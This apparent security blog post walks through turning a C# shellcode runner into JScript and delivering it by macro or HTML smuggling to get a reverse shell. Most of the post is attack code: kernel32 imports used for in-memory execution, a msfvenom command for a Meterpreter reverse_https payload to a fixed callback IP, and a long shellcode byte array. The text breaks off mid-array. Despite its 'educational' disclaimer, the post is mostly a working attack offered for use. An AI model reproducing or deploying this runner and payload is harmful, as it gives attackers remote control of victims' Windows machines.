I"ле<p>All exploits are written my myself and are for educational purposes only, i would not be liable for any misuse!</p>

<p>###Shellcode runner to Jscript 
this works well with HTML smuggling attack!
<br />
We start by creating a C# shellcode runner with or without encryption then convert it to Jscript, then leverage client side execution to get a reverse shell 
 Steps</p>
<ol>
  <li>we create a C# shellcode runner</li>
  <li>we convert it to Jscript using DotNet2Jscript</li>
  <li>we gain client side execution using Macro OR  HTML Smuggling</li>
  <li>Can research running jscrip on client side</li>
</ol>

<div class="language-csharp highlighter-rouge"><div class="highlight"><pre class="highlight"><code>

<span class="k">using</span> <span class="nn">System.Diagnostics</span><span class="p">;</span>
<span class="k">using</span> <span class="nn">System.Runtime.InteropServices</span><span class="p">;</span>
<span class="k">using</span> <span class="nn">System.Windows.Forms</span><span class="p">;</span>
<span class="k">using</span> <span class="nn">System</span><span class="p">;</span>

<span class="p">[</span><span class="nf">ComVisible</span><span class="p">(</span><span class="k">true</span><span class="p">)]</span>
<span class="k">public</span> <span class="k">class</span> <span class="nc">TestClass</span>
<span class="p">{</span>
    <span class="p">[</span><span class="nf">DllImport</span><span class="p">(</span><span class="s">"kernel32"</span><span class="p">)]</span>
    <span class="k">public</span> <span class="k">static</span> <span class="k">extern</span> <span class="n">IntPtr</span> <span class="nf">VirtualAlloc</span><span class="p">(</span><span class="n">IntPtr</span> <span class="n">lpAddress</span><span class="p">,</span> <span class="kt">uint</span> <span class="n">dwSize</span><span class="p">,</span> <span class="kt">uint</span> <span class="n">flAllocationType</span><span class="p">,</span> <span class="kt">uint</span> <span class="n">flProtect</span><span class="p">);</span>

    <span class="p">[</span><span class="nf">DllImport</span><span class="p">(</span><span class="s">"kernel32"</span><span class="p">,</span> <span class="n">CharSet</span> <span class="p">=</span> <span class="n">CharSet</span><span class="p">.</span><span class="n">Ansi</span><span class="p">)]</span>
    <span class="k">public</span> <span class="k">static</span> <span class="k">extern</span> <span class="n">IntPtr</span> <span class="nf">CreateThread</span><span class="p">(</span><span class="n">IntPtr</span> <span class="n">lpThreadAttributes</span><span class="p">,</span> <span class="kt">uint</span> <span class="n">dwStackSize</span><span class="p">,</span> <span class="n">IntPtr</span> <span class="n">lpStartAddress</span><span class="p">,</span>
    <span class="n">IntPtr</span> <span class="n">lpParameter</span><span class="p">,</span> <span class="kt">uint</span> <span class="n">dwCreationFlags</span><span class="p">,</span> <span class="n">IntPtr</span> <span class="n">lpThreadId</span><span class="p">);</span>

    <span class="p">[</span><span class="nf">DllImport</span><span class="p">(</span><span class="s">"kernel32.dll"</span><span class="p">,</span> <span class="n">SetLastError</span> <span class="p">=</span> <span class="k">true</span><span class="p">)]</span>
    <span class="k">static</span> <span class="k">extern</span> <span class="n">UInt32</span> <span class="nf">WaitForSingleObject</span><span class="p">(</span><span class="n">IntPtr</span> <span class="n">hHandle</span><span class="p">,</span> <span class="n">UInt32</span> <span class="n">dwMilliseconds</span><span class="p">);</span>
    <span class="k">public</span> <span class="nf">TestClass</span><span class="p">()</span>
    <span class="p">{</span>
            <span class="c1">// msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.49.66 LPORT=443 -f csharp</span>

        <span class="kt">byte</span><span class="p">[]</span> <span class="n">buf</span> <span class="p">=</span> <span class="k">new</span> <span class="kt">byte</span><span class="p">[</span><span class="m">679</span><span class="p">]</span> <span class="p">{</span>
            <span class="m">0xfc</span><span class="p">,</span><span class="m">0x48</span><span class="p">,</span><span class="m">0x83</span><span class="p">,</span><span class="m">0xe4</span><span class="p">,</span><span class="m">0xf0</span><span class="p">,</span><span class="m">0xe8</span><span class="p">,</span><span class="m">0xcc</span><span class="p">,</span><span class="m">0x00</span><span class="p">,</span><span class="m">0x00</span><span class="p">,</span><span class="m">0x00</span><span class="p">,</span><span class="m">0x41</span><span class="p">,</span><span class="m">0x51</span><span class="p">,</span><span class="m">0x41</span><span class="p">,</span><span class="m">0x50</span><span class="p">,</span><span class="m">0x52</span><span class="p">,</span>
            <span class="m">0x51</span><span class="p">,</span><span class="m">0x48</span><span class="p">,</span><span class="m">0x31</span><span class="p">,</span><span class="m">0xd2</span><span class="p">,</span><span class="m">0x65</span><span class="p">,</span><span class="m">0x48</span><span class="p">,</span><span class="m">0x8b</span><span class="p">,</span><span class="m">0x52</span><span class="p">,</span><span class="m">0x60</span><span class="p">,</span><span class="m">0x56</span><span class="p">,</span><span class="m">0x48</span><span class="p">,</span><span class="m">0x8b</span><span class="p">,</span><span class="m">0x52</span><span class="p">,</span><span class="m">0x18</span><span class="p">,</span><span class="m">0x48</span><span class="p">,</span>
            <span class="m">0x8b</span><span class="p">,</span><span class="m">0x52</span><span class="p">,</span><span class="m">0x20</span><span class="p">,</span><span class="m">0x4d</span><span class="p">,</span><span class="m">0x31</span><span class="p">,</span><span class="m">0xc9</span><span class="p">,</span><span class="m">0x48</span><span class="p">,</span><span class="m">0x0f</span><span class="p">,</span><span class="m">0xb7</span><span class="p">,</span><span class="m">0x4a</span><span class="p">,</span><span class="m">0x4a</span><span class="p">,</span><span class="m">0x48</span><span class="p">,</span><span class="m">0x8b</span><span class="p">,</span><span class="m">0x72</span><span class="p">,</span><span class="m">0x50</span><span class="p">,</span>
            <span class="m">0x48</span><span class="p">,</span><span class="m">0x31</span><span class="p">,</span><span class="m">0xc0</span><span class="p">,</span><span class="m">0xac</span><span class="p">,</span><span class="m">0x3c</span><span class="p">,</span><span class="m">0x61</span><span class="p">,</span><span class="m">0x7c</span><span class="p">,</span><span class="m">0x02</span><span class="p">,</span><span class="m">0x2c</span><span class="p">,</span><span class="m">0x20</span><span class="p">,</span><span class="m">0x41</span><span class="p">,</span><span class="m">0xc1</span><span class="p">,</span><span class="m">0xc9</span><span class="p">,</span><span class="m">0x0d</span><span class="p">,</span><span class="m">0x41</span><span class="p">,</span>
            <span class="m">0x01</span><span class="p">,</span><span class="m">0xc1</span><span class="p">,</span><span class="m">0xe2</span><span class="p">,</span><span class="m">0xed</span><span class="p">,</span><span class="m">0x52</span><span class="p">,</span><span class="m">0x48</span><span class="p">,</span><span class="m">0x8b</span><span class="p">,</span><span class="m">0x52</span><span class="p">,</span><span class="m">0x20</span><span class="p">,</span><span class="m">0x41</span><span class="p">,</span><span class="m">0x51</span><span class="p">,</span><span class="m">0x8b</span><span class="p">,</span><span class="m">0x42</span><span class="p">,</span><span class="m">0x3c</span><span class="p">,</span><span class="m">0x48</span><span class="p">,</span>
            <span class="m">0x01</span><span class="p">,</span><span class="m">0xd0</span><span class="p">,</span><span class="m">0x66</span><span class="p">,</span><span class="m">0x81</span><span class="p">,</span><span class="m">0x78</span><span class="p">,</span><span class="m">0x18</span><span class="p">,</span><span class="m">0x0b</span><span class="p">,</span><span class="m">0x02</span><span class="p">,</span><span class="m">0x0f</span><span class="p">,</span><span class="m">0x85</span><span class="p">,</span><span class="m">0x72</span><span class="p">,</span><span class="m">0x00</span><span class="p">,</span><span class="m">0x00</span><span class="p">,</span><span class="m">0x00</span><span class="p">,</span><span class="m">0x8b</span><span class="p">,</span>
            <span class="m">0x80</span><span class="p">,</span><span class="m">0x88</span><span class="p">,</span><span class="m">0x00</span><span class="p">,</span><span class="m">0x00</span><span class="p">,</span><span class="m">0x00</span><span class="p">,</span><span class="m">0x48</span><span class="p">,</span><span class="m">0x85</span><span class="p">,</span><span class="m">0xc0</span><span class="p">,</span><span class="m">0x74</span><span class="p">,</span><span class="m">0x67</span><span class="p">,</span><span class="m">0x48</span><span class="p">,</span><span class="m">0x01</span><span class="p">,</span><span class="m">0xd0</span><span class="p">,</span><span class="m">0x44</span><span class="p">,</span><span class="m">0x8b</span><span class="p">,</span>
            <span class="m">0x40</span><span class="p">,</span><span class="m">0x20</span><span class="p">,</span><span class="m">0x50</span><span class="p">,</span><span class="m">0x49</span><span class="p">,</span><span class="m">0x01</span><span class="p">,</span><span class="m">0xd0</span><span class="p">,</span><span class="m">0x8b</span><span class="p">,</span><span class="m">0x48</span><span class="p">,</span><span class="m">0x18</span><span class="p">,</span><span class="m">0xe3</span><span class="p">,</span><span class="m">0x56</span><span class="p">,</span><span class="m">0x48</span><span class="p">,</span><span class="m">0xff</span><span class="p">,</span><span class="m">0xc9</span><span class="p">,</span><span class="m">0x4d</span><span class="p">,</span>
            <span class="m">0x31</span><span class="p">,</span><span class="m">0xc9</span><span class="p">,</span><span class="m">0x41</span><span class="p">,</span><span class="m">0x8b</span><span class="p">,</span><span class="m">0x34</span><span class="p">,</span><span class="m">0x88</span><span class="p">,</span><span class="m">0x48</span><span class="p">,</span><span class="m">0x01</span><span class="p">,</span><span class="m">0xd6</span><span class="p">,</span><span class="m">0x48</span><span class="p">,</span><span class="m">0x31</span><span class="p">,</span><span class="m">0xc0</span><span class="p">,</span><span class="m">0x41</span><span class="p">,</span><span class="m">0xc1</span><span class="p">,</span><span class="m">0xc9</span><span class="p">,</span>
            <span class="m">0x0d</span><span class="p">,</span><span class="m">0xac</span><span class="p">,</span><span class="m">0x41</span><span class="p">,</span><span class="m">0x01</span><span class="p">,</span><span class="m">0xc1</span><span class="p">,</span><span class="m">0x38</span><span class="p">,</span><span class="m">0xe0</span><span class="p">,</span><span class="m">0x75</span><span class="p">,</span><span class="m">0xf1</span><span class="p">,</span><span class="m">0x4c</span><span class="p">,</span><span class="m">0x03</span><span class="p">,</span><span class="m">0x4c</span><span class="p">,</span><span class="m">0x24</span><span class="p">,</span><span class="m">0x08</span><span class="p">,</span><span class="m">0x45</span><span class="p">,</span>
            <span class="m">0x39</span><span class="p">,</span><span class="m">0xd1</span><span class="p">,</span><span class="m">0x75</span><span class="p">,</span><span class="m">0xd8</span><span class="p">,</span><span class="m">0x58</span><span class="p">,</span><span class="m">0x44</span><span class="p">,</span><span class="m">0x8b</span><span class="p">,</span><span class="m">0x40</span><span class="p">,</span><span class="m">0x24</span><span class="p">,</span><span class="m">0x49</span><span class="p">,</span><span class="m">0x01</span><span class="p">,</span><span class="m">0xd0</span><span class="p">,</span><span class="m">0x66</span><span class="p">,</span><span class="m">0x41</span><span class="p">,</span><span class="m">0x8b</span><span class="p">,</span>
            <span class="m">0x0c</span><span class="p">,</span><span class="m">0x48</span><span class="p">,</span><span class="m">0x44</span><span class="p">,</span><span class="m">0x8b</span><span class="p">,</span><span class="m">0x40</span><span class="p">,</span><span class="m">0x1c</span><span class="p">,</span><span class="m">0x49</span><span class="p">,</span><span class="m">0x01</span><span class="p">,</span><span class="m">0xd0</span><span class="p">,</span><span class="m">0x41</span><span class="p">,</span><span class="m">0x8b</span><span class="p">,</span><span class="m">0x04</span><span class="p">,</span><span class="m">0x88</span><span class="p">,</span><span class="m">0x41</span><span class="p">,</span><span class="m">0x58</span><span class="p">,</span>
            <span class="m">0x48</span><span class="p">,</span><span class="m">0x01</span><span class="p">,</span><span class="m">0xd0</span><span class="p">,</span><span class="m">0x41</span><span class="p">,</span><span class="m">0x58</span><span class="p">,</span><span class="m">0x5e</span><span class="p">,</span><span class="m">0x59</span><span class="p">,</span><span class="m">0x5a</span><span class="p">,</span><span class="m">0x41</span><span class="p">,</span><span class="m">0x58</span><span class="p">,</span><span class="m">0x41</span><span class="p">,</span><span class="m">0x59</span><span class="p">,</span><span class="m">0x41</span><span class="p">,</span><span class="m">0x5a</span><span class="p">,</span><span class="m">0x48</span><span class="p">,</span>
            <span class="m">0x83</span><span class="p">,</span><span class="m">0xec</span><span class="p">,</span><span class="m">0x20</span><span class="p">,</span><span class="m">0x41</span><span class="p">,</span><span class="m">0x52</span><span class="p">,</span><span class="m">0xff</span><span class="p">,</span><span class="m">0xe0</span><span class="p">,</span><span class="m">0x58</span><span class="p">,</span><span class="m">0x41</span><span class="p">,</span><span class="m">0x59</span><span class="p">,</span><span class="m">0x5a</span><span class="p">,</span><span class="m">0x48</span><span class="p">,</span><span class="m">0x8b</span><span class="p">,</span><span class="m">0x12</span><span class="p">,</span><span class="m">0xe9</span><span class="p">,</span>
            <span class="m">0x4b</span><span class="p">,</span><span class="m">0xff</span><span class="p">,</span><span class="m">0xff</span><span class="p">,</span><span class="m">0xff</span><span class="p">,</span><span class="m">0x5d</span><span class="p">,</span><span class="m">0x48</span><span class="p">,</span><span class="m">0x31</span><span class="p">,</span><span class="m">0xdb</span><span class="p">,</span><span class="m">0x53</span><span class="p">,</span><span class="m">0x49</span><span class="p">,</span><span class="m">0xbe</span><span class="p">,</span><span class="m">0x77</span><span class="p">,</span><span class="m">0x69</span><span class="p">,</span><span class="m">0x6e</span><span class="p">,</span><span class="m">0x69</span><span class="p">,</span>
            <span class="m">0x6e</span><span class="p">,</span><span class="m">0x65</span><span class="p">,</span><span class="m">0x74</span><span class="p">,</span><span class="m">0x00</span><span class="p">,</span><span class="m">0x41</span><span class="p">,</span><span class="m">0x56</span><span class="p">,</span><span class="m">0x48</span><span class="p">,</span><span class="m">0x89</span><span class="p">,</span><span class="m">0xe1</span><span class="p">,</span><span class="m">0x49</span><span class="p">,</span><span class="m">0xc7</span><span class="p">,</span><span class="m">0xc2</span><span class="p">,</span><span class="m">0x4c</span><span class="p">,</span><span class="m">0x77</span><span class="p">,</span><span class="m">0x26</span><span class="p">,</span>
            <span class="m">0x07</span><span class="p">,</span><span class="m">0xff</span><span class="p">,</span><span class="m">0xd5</span><span class="p">,</span><span class="m">0x53</span><span class="p">,</span><span class="m">0x53</span><span class="p">,</span><span class="m">0x48</span><span class="p">,</span><span class="m">0x89</span><span class="p">,</span><span class="m">0xe1</span><span class="p">,</span><span class="m">0x53</span><span class="p">,</span><span class="m">0x5a</span><span class="p">,</span><span class="m">0x4d</span><span class="p">,</span><span class="m">0x31</span><span class="p">,</span><span class="m">0xc0</span><span class="p">,</span><span class="m">0x4d</span><span class="p">,</span><span class="m">0x31</span><span class="p">,</span>
            <span class="m">0xc9</span><span class="p">,</span><span class="m">0x53</span><span class="p">,</span><span class="m">0x53</span><span class="p">,</span><span class="m">0x49</span><span class="p">,</span><span class="m">0xba</span><span class="p">,</span><span class="m">0x3a</span><span class="p">,</span><span class="m">0x56</span><span class="p">,</span><span class="m">0x79</span><span class="p">,</span><span class="m">0xa7</span><span class="p">,</span><span class="m">0x00</span><span class="p">,</span><span class="m">0x00</span><span class="p">,</span><span class="m">0x00</span><span class="p">,</span><span class="m">0x00</span><span class="p">,</span><span class="m">0xff</span><span class="p">,</span><span class="m">0xd5</span><span class="p">,</span>
            <span class="m">0xe8</span><span class="p">,</span><span class="m">0x0e</span><span class="p">,</span><span class="m">0x00</span><span class="p">,</span><span class="m">0x00</span><span class="p">,</span><span class="m">0x00</span><span class="p">,</span><span class="m">0x31</span><span class="p">,</span><span class="m">0x39</span><span class="p">,</span><span class="m">0x32</span><span class="p">,</span><span class="m">0x2e</span><span class="p">,</span><span class="m">0x31</span><span class="p">,</span><span class="m">0x36</span><span class="p">,</span><span class="m">0x38</span><span class="p">,</span><span class="m">0x2e</span><span class="p">,</span><span class="m">0x34</span><span class="p">,</span><span class="m">0x39</span><span class="p">,</span>
            <span class="m">0x2e</span><span class="p">,</span><span class="m">0x36</span><span class="p">,</span><span class="m">0x36</span><span class="p">,</span><span class="m">0x00</span><span class="p">,</span><span class="m">0x5a</span><span class="p">,</span><span class="m">0x48</span><span class="p">,</span><span class="m">0x89</span><span class="p">,</span><span class="m">0xc1</span><span class="p">,</span><span class="m">0x49</span><span class="p">,</span><span class="m">0xc7</span><span class="p">,</span><span class="m">0xc0</span><span class="p">,</span><span class="m">0xbb</span><span class="p">,</span><span class="m">0x01</span><span class="p">,</span><span class="m">0x00</span><span class="p">,</span><span class="m">0x00</span><span class="p">,</span>
            <span class="m">0x4d</span><span class="p">,</span><span class="m">0x31</span><span class="p">,</span><span class="m">0xc9</span><span class="p">,</span><span class="m">0x53</span><span class="p">,</span><span class="m">0x53</span><span class="p">,</span><span class="m">0x6a</span><span class="p">,</span><span class="m">0x03</span><span class="p">,</span><span class="m">0x53</span><span class="p">,</span><span class="m">0x49</span><span class="p">,</span><span class="m">0xba</span><span class="p">,</span><span class="m">0x57</span><span class="p">,</span><span class="m">0x89</span><span class="p">,</span><span class="m">0x9f</span><span class="p">,</span><span class="m">0xc6</span><span class="p">,</span><span class="m">0x00</span><span class="p">,</span>
            <span class="m">0x00</span><span class="p">,</span><span class="m">0x00</span><span class="p">,</span><span class="m">0x00</span><span class="p">,</span><span class="m">0xff</span><span class="p">,</span><span class="m">0xd5</span><span class="p">,</span><span class="m">0xe8</span><span class="p">,</span><span class="m">0x7e</span><span class="p">,</span><span class="m">0x00</span><span class="p">,</span><span class="m">0x00</span><span class="p">,</span><span class="m">0x00</span><span class="p">,</span><span class="m">0x2f</span><span class="p">,</span><span class="m">0x4b</span><span class="p">,</span><span class="m">0x65</span><span class="p">,</span><span class="m">0x70</span><span class="p">,</span><span class="m">0x39</span><span class="p">,</span>
            <span class="m">0x73</span><span class="p">,</span><span class="m">0x53</span><span class="p">,</span><span class="m">0x2d</span><span class="p">,</span><span class="m">0x50</span><span class="p">,</span><span class="m">0x45</span><span class="p">,</span><span class="m">0x56</span><span class="p">,</span><span class="m">0x51</span><span class="p">,</span><span class="m">0x66</span><span class="p">,</span><span class="m">0x2d</span><span class="p">,</span><span class="m">0x78</span><span class="p">,</span><span class="m">0x37</span><span class="p">,</span><span class="m">0x35</span><span class="p">,</span><span class="m">0x66</span><span class="p">,</span><span class="m">0x65</span><span class="p">,</span><span class="m">0x30</span><span class="p">,</span>
            <span class="m">0x7a</span><span class="p">,</span><span class="m">0x75</span><span class="p">,</span><span class="m">0x51</span><span class="p">,</span><span class="m">0x55</span><span class="p">,</span><span class="m">0x4e</span><span class="p">,</span><span class="m">0x43</span><span class="p">,</span><span class="m">0x6e</span><span class="p">,</span><span class="m">0x52</span><span class="p">,</span><span class="m">0x35</span><span class="p">,</span><span class="m">0x32</span><span class="p">,</span><span class="m">0x79</span><span class="p">,</span><span class="m">0x48</span><span class="p">,</span><span class="m">0x54</span><span class="p">,</span><span class="m">0x57</span><span class="p">,</span><span class="m">0x4d</span><span class="p">,</span>
            <span class="m">0x50</span><span class="p">,</span><span class="m">0x65</span><span class="p">,</span><span class="m">0x51</span><span class="p">,</span><span class="m">0x61</span><span class="p">,</span><span class="m">0x33</span><span class="p">,</span><span class="m">0x69</span><span class="p">,</span><span class="m">0x62</span><span class="p">,</span><span class="m">0x66</span><span class="p">,</span><span class="m">0x35</span><span class="p">,</span><span class="m">0x4f</span><span class="p">,</span><span class="m">0x4f</span><span class="p">,</span><span class="m">0x57</span><span class="p">,</span><span class="m">0x52</span><span class="p">,</span><span class="m">0x79</span><span class="p">,</span><span class="m">0x56</span><span class="p">,</span>
            <span class="m">0x7a</span><span class="p">,</span><span class="m">0x38</span><span class="p">,</span><span class="m">0x78</span><span class="p">,</span><span class="m">0x73</span><span class="p">,</span><span class="m">0x65</span><span class="p">,</span><span class="m">0x65</span><span class="p">,</span><span class="m">0x53</span><span class="p">,</span><span class="m">0x74</span><span class="p">,</span><span class="m">0x46</span><span class="p">,</span><span class="m">0x45</span><span class="p">,</span><span class="m">0x33</span><span class="p">,</span><span class="m">0x46</span><span class="p">,</span><span class="m">0x36</span><span class="p">,</span><span class="m">0x68</span><span class="p">,</span><span class="m">0x73</span><span class="p">,</span>
            <span class="m">0x6a</span><span class="p">,</span><span class="m">0x54</span><span class="p">,</span><span class="m">0x5a</span><span class="p">,</span><span class="m">0x44</span><span class="p">,</span><span class="m">0x6e</span><span class="p">,</span><span class="m">0x61</span><span class="p">,</span><span class="m">0x4c</span><span class="p">,</span><span class="m">0x51</span><span class="p">,</span><span class="m">0x56</span><span class="p">,</span><span class="m">0x51</span><span class="p">,</span><span class="m">0x4d</span><span class="p">,</span><span class="m">0x5a</span><span class="p">,</span><span class="m">0x71</span><span class="p">,</span><span class="m">0x6f</span><span class="p">,</span><span class="m">0x41</span><span class="p">,</span>
            <span class="m">0x77</span><span class="p">,</span><span class="m">0x6d</span><span class="p">,</span><span class="m">0x69</span><span class="p">,</span><span class="m">0x33</span><span class="p">,</span><span class="m">0x39</span><span class="p">,</span><span class="m">0x6b</span><span class="p">,</span><span class="m">0x41</span><span class="p">,</span><span class="m">0x43</span><span class="p">,</span><span class="m">0x74</span><span class="p">,</span><span class="m">0x69</span><span class="p">,</span><span class="m">0x30</span><span class="p">,</span><span class="m">0x45</span><span class="p">,</span><span class="m">0x6b</span><span class="p">,</span><span class="m">0x6c</span><span class="p">,</span><span class="m">0x61</span><span class="p">,</span>
            <span class="m">0x42</span><span class="p">,</span><span class="m">0x6e</span><span class="p">,</span><span class="m">0x4e</span><span class="p">,</span><span class="m">0x61</span><span class="p">,</span><span class="m">0x6f</span><span class="p">,</span><span class="m">0x36</span><span class="p">,</span><span class="m">0x48</span><span class="p">,</span><span class="m">0x68</span><span class="p">,</span><span class="m">0x35</span><span class="p">,</span><span class="m">0x4e</span><span class="p">,</span><span class="m">0x55</span><span class="p">,</span><span class="m">0x79</span><span class="p">,</span><span class="m">0x72</span><span class="p">,</span><span class="m">0x53</span><span class="p">,</span><span class="m">0x62</span><span class="p">,</span>
            <span class="m">0x41</span><span class="p">,</span><span class="m">0x4e</span><span class="p">,</span><span class="m">0x5a</span><span class="p">,</span><span class="m">0x6b</span><span class="p">,</span><span class="m">0x48</span><span class="p">,</span><span class="m">0x30</span><span class="p">,</span><span class="m">0x44</span><span class="p">,</span><span class="m">0x42</span><span class="p">,</span><span class="m">0x61</span><span class="p">,</span><span class="m">0x39</span><span class="p">,</span><span class="m">0x63</span><span class="p">,</span><span class="m">0x63</span><span class="p">,</span><span class="m">0x34</span><span class="p">,</span><span class="m">0x42</span><span class="p">,</span><span class="m">0x46</span><span class="p">,</span>
            <span class="m">0x00</span><span class="p">,</span><span class="m">0x48</span><span class="p">,</span><span class="m">0x89</span><span class="p">,</span><span class="m">0xc1</span><span class="p">,</span><span class="m">0x53</span><span class="p">,</span><span class="m">0x5a</span><span class="p">,</span><span class="m">0x41</span><span class="p">,</span><span class="m">0x58</span><span class="p">,</span><span class="m">0x4d</span><span class="p">,</span><span class="m">0x31</span><span class="p">,</span><span class="m">0xc9</span><span class="p">,</span><span class="m">0x53</span><span class="p">,</span><span class="m">0x48</span><span class="p">,</span><span class="m">0xb8</span><span class="p">,</span><span class="m">0x00</span><span class="p">,</span>
            <span class="m">0x32</span><span class="p">,</span><span class="m">0xa8</span><span class="p">,</span><span class="m">0x84</span><span class="p">,</span><span class="m">0x00</span><span class="p">,</span><span class="m">0x00</span><span class="p">,</span><span class="m">0x00</span><span class="p">,</span><span class="m">0x00</span><span class="p">,</span><span class="m">0x50</span><span class="p">,</span><span class="m">0x53</span><span class="p">,</span><span class="m">0x53</span><span class="p">,</span><span class="m">0x49</span><span class="p">,</span><span class="m">0xc7</span><span class="p">,</span><span class="m">0xc2</span><span class="p">,</span><span class="m">0xeb</span><span class="p">,</span><span class="m">0x55</span><span class="p">,</span>
            <span class="m">0x2e</span><span class="p">,</span><span class="m">0x3b</span><span class="p">,</span><span class="m">0xff</span><span class="p">,</span><span class="m">0xd5</span><span class="p">,</span><span class="m">0x48</span><span class="p">,</span><span class="m">0x89</span><span class="p">,</span><span class="m">0xc6</span><span class="p">,</span><span class="m">0x6a</span><span class="p">,</span><span class="m">0x0a</span><span class="p">,</span><span class="m">0x5f</span><span class="p">,</span><span class="m">0x48</span><span class="p">,</span><span class="m">0x89</span><span class="p">,</span><span class="m">0xf1</span><span class="p">,</span><span class="m">0x6a</span><span class="p">,</span><span class="m">0x1f</span><span class="p">,</span>
            <span class="m">0x5a</span><span class="p">,</span><span class="m">0x52</span><span class="p">,</span><span class="m">0x68</span><span class="p">,</span><span class="m">0x80</span><span class="p">,</span><span class="m">0x33</span><span class="p">,</span><span class="m">0x00</span><span class="p">,</span><span class="m">0x00</span><span class="p">,</span><span class="m">0x49</span><span class="p">,</span><span class="m">0x89</span><span class="p">,</span><span class="m">0xe0</span><span class="p">,</span><span class="m">0x6a</span><span class="p">,</span><span class="m">0x04</span><span class="p">,</span><span class="m">0x41</span><span class="p">,</span><span class="m">0x59</span><span class="p">,</span><span class="m">0x49</span><span class="p">,</span>
            <span class="m">0xba</span><span class="p">,</span><span class="m">0x75</span><span class="p">,</span><span class="m">0x46</span><span class="p">,</span><span class="m">0x9e</span><span class="p">,</span><span class="m">0x86</span><span class="p">,</span><span class="m">0x00</span><span class="p">,</span><span class="m">0x00</span><span class="p">,</span><span class="m">0x00</span><span class="p">,</span><span class="m">0x00</span><span class="p">,</span><span class="m">0xff</span><span class="p">,</span><span class="m">0xd5</span><span class="p">,</span><span class="m">0x4d</span><span class="p">,</span><span class="m">0x31</span><span class="p">,</span><span class="m">0xc0</span><span class="p">,</span><span class="m">0x53</span><span class="p">,</span>
            <span class="m">0x5a</span><span class="p">,</span><span class="m">0x48</span><span class="p">,</span><span class="m">0x89</span><span class="p">,</span><span class="m">0xf1</span><span class="p">,</span><span class="m">0x4d</span><span class="p">,</span><span class="m">0x31</span><span class="p">,</span><span class="m">0xc9</span><span class="p">,</span><span class="m">0x4d</span><span class="p">,</span><span class="m">0x31</span><span class="p">,</span><span class="m">0xc9</span><span class="p">,</span><span class="m">0x53</span><span class="p">,</span><span class="m">0x53</span><span class="p">,</span><span class="m">0x49</span><span class="p">,</span><span class="m">0xc7</span><span class="p">,</span><span class="m">0xc2</span><span class="p">,</span>
            <span class="m">0x2d</span><span class="p">,</span><span class="m">0x06</span><span class="p">,</span><span class="m">0x18</span><span class="p">,</span><span class="m">0x7b</span><span class="p">,</span><span class="m">0xff</span><span class="p">,</span><span class="m">0xd5</span><span class="p">,</span><span class="m">0x85</span><span class="p">,</span><span class="m">0xc0</span><span class="p">,</span><span class="m">0x75</span><span class="p">,</span><span class="m">0x1f</span><span class="p">,</span><span class="m">0x48</span><span class="p">,</span><span class="m">0xc7</span><span class="p">,</span><span class="m">0xc1</span><span class="p">,</span><span class="m">0x88</span><span class="p">,</span><span class="m">0x13</span><span class="p">,</span>
            <span class="m">0x00</span><span class="p">,</span><span class="m">0x00</span><span class="p">,</span><span class="m">0x49</span><span class="p">,</span><span class="m">0xba</span><span class="p">,</span><span class="m">0x44</span><span class="p">,</span><span class="m">0xf0</span><span class="p">,</span><span class="m">0x35</span><span class="p">,</span><span class="m">0xe0</span><span class="p">,</span><span class="m">0x00</span><span class="p">,</span><span class="m">0x00</span><span class="p">,</span><span class="m">0x00</span><span class="p">,</span><span class="m">0x00</span><span class="p">,</span><span class="m">0xff</span><span class="p">,</span><span class="m">0xd5</span><span class="p">,</span><span class="m">0x48</span><span class="p">,</span>
            <span class="m">0xff</span><span class="p">,</span><span class="m">0xcf</span><span class="p">,</span><span class="m">0x74</span><span class="p">,</span><span class="m">0x02</span><span class="p">,</span><span class="m">0xeb</span><span class="p">,</span><span class="m">0xaa</span><span class="p">,</span><span class="m">0xe8</span><span class="p">,</span><span class="m">0x55</span><span class="p">,</span><span class="m">0x00</span><span class="p">,</span><span class="m">0x00</span><span class="p">,</span><span class="m">0x00</span><span class="p">,</span><span class="m">0x53</span><span class="p">,</span><span class="m">0x59</span><span class="p">,</span><span class="m">0x6a</span><span class="p">,</span><span class="m">0x40</span><span class="p">,</span>
            <span class="m">0x5a</span><span class="p">,</span><span class="m">0x49</span><span class="p">,</span><span class="m">0x89</span><span class="p">,</span><span class="m">0xd1</span><span class="p">,</span><span class="m">0xc1</span><span class="p">,</span><span class="m">0xe2</span><span class="p">,</span><span class="m">0x10</span><span class="p">,</span><span class="m">0x49</span><span class="p">,</span><span class="m">0xc7</span><span class="p">,</span><span class="m">0xc0</span><span class="p">,</span><span class="m">0x00</span><span class="p">,</span><span class="m">0x10</span><span class="p">,</span><span class="m">0x00</span><span class="p">,</span><span class="m">0x00</span><span class="p">,</span><span class="m">0x49</span><span class="p">,</span>
            <span class="m">0xba</span><span class="p">,</span><span class="m">0x58</span><span class="p">,</span><span class="m">0xa4</span><span class="p">,</span><span class="m">0x53</span><span class="p">,</span><span class="m">0xe5</span><span class="p">,</span><span class="m">0x00</span><span class="p">,</span><span class="m">0x00</span><span class="p">,</span><span class="m">0x00</span><span class="p">,</span><span class="m">0x00</span><span class="p">,</span><span class="m">0xff</span><span class="p">,</span><span class="m">0xd5</span><span class="p">,</span><span class="m">0x48</span><span class="p">,</span><span class="m">0x93</span><span class="p">,</span><span class="m">0x53</span><span class="p">,</span><span class="m">0x53</span><span class="p">,</span>
            <span class="m">0x48</span><span class="p">,</span><span class="m">0x89</span><span class="p">,</span><span class="m">0xe7</span><span class="p">,</span><span class="m">0x48</span><span class="p">,</span><span class="m">0x89</span><span class="p">,</span><span class="m">0xf1</span><span class="p">,</span><span class="m">0x48</span><span class="p">,</span><span class="m">0x89</span><span class="p">,</span><span class="m">0xda</span><span class="p">,</span><span class="m">0x49</span><span class="p">,</span><span class="m">0xc7</span><span class="p">,</span><span class="m">0xc0</span><span class="p">,</span><span class="m">0x00</span><span class="p">,</span><span class="m">0x20</span><span class="p">,</span><span class="m">0x00</span><span class="p">,</span>
            <span class="m">0x00</span><span class="p">,</span><span class="m">0x49</span><span class="p">,</span><span class="m">0x89</span><span class="p">,</span><span class="m">0xf9</span><span class="p">,</span><span class="m">0x49</span><span class="p">,</span><span class="m">0xba</span><span class="p">,</span><span class="m">0x12</span><span class="p">,</span><span class="m">0x96</span><span class="p">,</span><span class="m">0x89</span><span class="p">,</span><span class="m">0xe2</span><span class="p">,</span><span class="m">0x00</span><span class="p">,</span><span class="m">0x00</span><span class="p">,</span><span class="m">0x00</span><span class="p">,</span><span class="m">0x00</span><span class="p">,</span><span class="m">0xff</span><span class="p">,</span>
